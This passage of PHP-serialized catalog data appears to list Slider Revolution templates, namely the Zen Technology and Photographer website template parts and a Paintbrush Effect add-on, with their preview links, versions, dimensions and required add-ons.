your technology focused project. Easy to edit and get started!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Zen Technology Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"39\";s:9:\"installed\";b:0;}i:464;a:25:{s:2:\"id\";s:3:\"500\";s:5:\"title\";s:8:\"Zen Menu\";s:5:\"alias\";s:8:\"zen-menu\";s:3:\"zip\";s:18:\"packs/zen-menu.zip\";s:3:\"uid\";s:32:\"3b53d755058b75fa6172510dcca2f2bb\";s:3:\"img\";s:19:\"zen-menu/slide1.jpg\";s:7:\"preview\";s:66:\"https://www.sliderrevolution.com/templates/zen-technology-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:200:\"<span class=\"ttm_content\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Zen Technology Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"39\";s:9:\"installed\";b:0;}i:465;a:25:{s:2:\"id\";s:3:\"501\";s:5:\"title\";s:10:\"Zen Header\";s:5:\"alias\";s:10:\"zen-header\";s:3:\"zip\";s:20:\"packs/zen-header.zip\";s:3:\"uid\";s:32:\"13d3cdde05308616fda7e2920a29e006\";s:3:\"img\";s:21:\"zen-header/slide1.jpg\";s:7:\"preview\";s:66:\"https://www.sliderrevolution.com/templates/zen-technology-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:200:\"<span class=\"ttm_content\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Zen Technology Website Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"39\";s:9:\"installed\";b:0;}i:466;a:25:{s:2:\"id\";s:3:\"502\";s:5:\"title\";s:9:\"Zen About\";s:5:\"alias\";s:9:\"zen-about\";s:3:\"zip\";s:19:\"packs/zen-about.zip\";s:3:\"uid\";s:32:\"d50d4f9b43e025fa99503b9a4eec6551\";s:3:\"img\";s:20:\"zen-about/slide1.jpg\";s:7:\"preview\";s:66:\"https://www.sliderrevolution.com/templates/zen-technology-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:200:\"<span class=\"ttm_content\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Zen Technology Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"39\";s:9:\"installed\";b:0;}i:467;a:25:{s:2:\"id\";s:3:\"503\";s:5:\"title\";s:12:\"Zen Features\";s:5:\"alias\";s:12:\"zen-features\";s:3:\"zip\";s:22:\"packs/zen-features.zip\";s:3:\"uid\";s:32:\"f4f7f500fae57b1b55adace13f030778\";s:3:\"img\";s:23:\"zen-features/slide1.jpg\";s:7:\"preview\";s:66:\"https://www.sliderrevolution.com/templates/zen-technology-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:200:\"<span class=\"ttm_content\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Zen Technology Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"39\";s:9:\"installed\";b:0;}i:468;a:25:{s:2:\"id\";s:3:\"504\";s:5:\"title\";s:9:\"Zen Video\";s:5:\"alias\";s:9:\"zen-video\";s:3:\"zip\";s:19:\"packs/zen-video.zip\";s:3:\"uid\";s:32:\"fa83df1b45b795174770b1b0155e89f3\";s:3:\"img\";s:20:\"zen-video/slide1.jpg\";s:7:\"preview\";s:66:\"https://www.sliderrevolution.com/templates/zen-technology-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:200:\"<span class=\"ttm_content\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Zen Technology Website Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"39\";s:9:\"installed\";b:0;}i:469;a:25:{s:2:\"id\";s:3:\"505\";s:5:\"title\";s:11:\"Zen Pricing\";s:5:\"alias\";s:11:\"zen-pricing\";s:3:\"zip\";s:21:\"packs/zen-pricing.zip\";s:3:\"uid\";s:32:\"921f8e5c156d9027f6ae8f1c5e426251\";s:3:\"img\";s:22:\"zen-pricing/slide1.jpg\";s:7:\"preview\";s:66:\"https://www.sliderrevolution.com/templates/zen-technology-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:200:\"<span class=\"ttm_content\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Zen Technology Website Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"39\";s:9:\"installed\";b:0;}i:470;a:25:{s:2:\"id\";s:3:\"506\";s:5:\"title\";s:22:\"Zen Testimonials Title\";s:5:\"alias\";s:22:\"zen-testimonials-title\";s:3:\"zip\";s:32:\"packs/zen-testimonials-title.zip\";s:3:\"uid\";s:32:\"d9aeeb596c0455ddd564a60a2d449b17\";s:3:\"img\";s:33:\"zen-testimonials-title/slide1.jpg\";s:7:\"preview\";s:66:\"https://www.sliderrevolution.com/templates/zen-technology-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:200:\"<span class=\"ttm_content\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Zen Technology Website Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"39\";s:9:\"installed\";b:0;}i:471;a:25:{s:2:\"id\";s:3:\"507\";s:5:\"title\";s:16:\"Zen Testimonials\";s:5:\"alias\";s:16:\"zen-testimonials\";s:3:\"zip\";s:26:\"packs/zen-testimonials.zip\";s:3:\"uid\";s:32:\"5a0e0141599c63828e4b99e3bc863366\";s:3:\"img\";s:27:\"zen-testimonials/slide1.jpg\";s:7:\"preview\";s:66:\"https://www.sliderrevolution.com/templates/zen-technology-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:200:\"<span class=\"ttm_content\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Zen Technology Website Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"39\";s:9:\"installed\";b:0;}i:472;a:25:{s:2:\"id\";s:3:\"508\";s:5:\"title\";s:10:\"Zen Footer\";s:5:\"alias\";s:10:\"zen-footer\";s:3:\"zip\";s:20:\"packs/zen-footer.zip\";s:3:\"uid\";s:32:\"47fb8604e2aafa8cfc97f5af75fda911\";s:3:\"img\";s:21:\"zen-footer/slide1.jpg\";s:7:\"preview\";s:66:\"https://www.sliderrevolution.com/templates/zen-technology-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:200:\"<span class=\"ttm_content\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Zen Technology Website Template\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"39\";s:9:\"installed\";b:0;}i:473;a:22:{s:2:\"id\";s:3:\"509\";s:5:\"title\";s:24:\"Paintbrush Effect Add-on\";s:5:\"alias\";s:17:\"Paintbrush-Effect\";s:3:\"zip\";s:21:\"Paintbrush-Effect.zip\";s:3:\"uid\";s:32:\"b934d1376df026f0ff45447de17b5ee9\";s:3:\"img\";s:28:\"Paintbrush-Effect/slide1.jpg\";s:7:\"preview\";s:72:\"https://www.sliderrevolution.com/templates/paintbrush-effect-collection/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:179:\"<span class=\"ttm_content\">The Paintbrush Effect Add-on is the perfect way to add some interactivity to your website with Slider Revolution.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:338:\"[{\"path\":\"revslider-paintbrush-addon\\/revslider-paintbrush-addon.php\",\"name\":\"Paintbrush AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"},{\"path\":\"revslider-mousetrap-addon\\/revslider-mousetrap-addon.php\",\"name\":\"Mousetrap AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:474;a:25:{s:2:\"id\";s:3:\"510\";s:5:\"title\";s:29:\"Photographer Website Template\";s:5:\"alias\";s:29:\"photographer-website-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:37:\"photographer-website-template-package\";s:3:\"img\";s:50:\"packages/photographer-website-template-package.jpg\";s:7:\"preview\";s:73:\"https://www.sliderrevolution.com/templates/photographer-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:222:\"<span class=\"ttm_content\">The Photographer Website Template is the perfect way to introduce your portfolio. Showcase your latests works, projects and contacts with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:168:\"[{\"path\":\"revslider-mousetrap-addon\\/revslider-mousetrap-addon.php\",\"name\":\"Mousetrap AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Photographer Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"40\";s:9:\"installed\";b:0;}i:475;a:25:{s:2:\"id\";s:3:\"511\";s:5:\"title\";s:19:\"Photographer Header\";s:5:\"alias\";s:19:\"Photographer-Header\";s:3:\"zip\";s:29:\"packs/Photographer-Header.zip\";s:3:\"uid\";s:32:\"22de8b3b1eeca5d0d1087791a28cc641\";s:3:\"img\";s:30:\"Photographer-Header/slide1.jpg\";s:7:\"preview\";s:73:\"https://www.sliderrevolution.com/templates/photographer-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:222:\"<span class=\"ttm_content\">The Photographer Website Template is the perfect way to introduce your portfolio. Showcase your latests works, projects and contacts with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Photographer Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"40\";s:9:\"installed\";b:0;}i:476;a:25:{s:2:\"id\";s:3:\"512\";s:5:\"title\";s:27:\"Photographer Welcome Screen\";s:5:\"alias\";s:27:\"Photographer-Welcome-Screen\";s:3:\"zip\";s:37:\"packs/Photographer-Welcome-Screen.zip\";s:3:\"uid\";s:32:\"8de63df079ad8b7c0aa7bf164bd5fd8f\";s:3:\"img\";s:38:\"Photographer-Welcome-Screen/slide1.jpg\";s:7:\"preview\";s:73:\"https://www.sliderrevolution.com/templates/photographer-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:222:\"<span class=\"ttm_content\">The Photographer Website Template is the perfect way to introduce your portfolio. Showcase your latests works, projects and contacts with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Photographer Website Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"40\";s:9:\"installed\";b:0;}i:477;a:25:{s:2:\"id\";s:3:\"513\";s:5:\"title\";s:21:\"Photographer Showcase\";s:5:\"alias\";s:21:\"Photographer-Showcase\";s:3:\"zip\";s:31:\"packs/Photographer-Showcase.zip\";s:3:\"uid\";s:32:\"8b2c7a1541465f77e829a9ac58926359\";s:3:\"img\";s:32:\"Photographer-Showcase/slide1.jpg\";s:7:\"preview\";s:73:\"https://www.sliderrevolution.com/templates/photographer-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:222:\"<span class=\"ttm_content\">The Photographer Website Template is the perfect way to introduce your portfolio. Showcase your latests works, projects and contacts with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:168:\"[{\"path\":\"revslider-mousetrap-addon\\/revslider-mousetrap-addon.php\",\"name\":\"Mousetrap AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Photographer Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"40\";s:9:\"installed\";b:0;}i:478;a:25:{s:2:\"id\";s:3:\"514\";s:5:\"title\";s:22:\"Photographer Portfolio\";s:5:\"alias\";s:22:\"Photographer-Portfolio\";s:3:\"zip\";s:32:\"packs/Photographer-Portfolio.zip\";s:3:\"uid\";s:32:\"ba5cc502a9505725ef169eaf4852d10f\";s:3:\"img\";s:33:\"Photographer-Portfolio/slide1.jpg\";s:7:\"preview\";s:73:\"https://www.sliderrevolution.com/templates/photographer-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:222:\"<span class=\"ttm_content\">The Photographer Website Template is the perfect way to introduce your portfolio. Showcase your latests works, projects and contacts with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Photographer Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"40\";s:9:\"installed\";b:0;}i:479;a:25:{s:2:\"id\";s:3:\"515\";s:5:\"title\";s:21:\"Photographer Contacts\";s:5:\"alias\";s:21:\"Photographer-Contacts\";s:3:\"zip\";s:31:\"packs/Photographer-Contacts.zip\";s:3:\"uid\";s:32:\"6ac142733cd260b5d5d3cdce30885074\";s:3:\"img\";s:32:\"Photographer-Contacts/slide1.jpg\";s:7:\"preview\";s:73:\"https://www.sliderrevolution.com/templates/photographer-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:222:\"<span class=\"ttm_content\">The Photographer Website Template is the perfect way to introduce your portfolio. Showcase your latests works, projects and contacts with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Photographer Website Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"40\";s:9:\"installed\";b:0;}i:480;a:25:{s:2:\"id\";s:3:\"516\";s:5:\"title\";s:19:\"Photographer Footer\";s:5:\"alias\";s:19:\"Photographer-Footer\";s:3:\"zip\";s:29:\"packs/Photographer-Footer.zip\";s:3:\"uid\";s:32:\"5fae568a988d072fb14b66cc2732ea46\";s:3:\"img\";s:30:\"Photographer-Footer/slide1.jpg\";s:7:\"preview\";s:73:\"https://www.sliderrevolution.com/templates/photographer-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:222:\"<span class=\"ttm_content\">The Photographer Website Template is the perfect way to introduce your portfolio. Showcase your latests works, projects and contacts with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Photographer Website Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"40\";s:9:\"installed\";b:0;}i:481;a:25:{s:2:\"id\";s:3:\"517\";s:5:\"title\";s:18:\"Photographer Modal\";s:5:\"alias\";s:18:\"Photographer-Modal\";s:3:\"zip\";s:28:\"packs/Photographer-Modal.zip\";s:3:\"uid\";s:32:\"e6b47a765ad19bce4726540ff7211c07\";s:3:\"img\";s:29:\"Photographer-Modal/slide1.jpg\";s:7:\"preview\";s:73:\"https://www.sliderrevolution.com/templates/photographer-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:6:\"6.2.23\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:222:\"<span class=\"ttm_content\">The Photographer Website Template is the perfect way to introduce your portfolio. Showcase your latests works, projects and contacts with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" 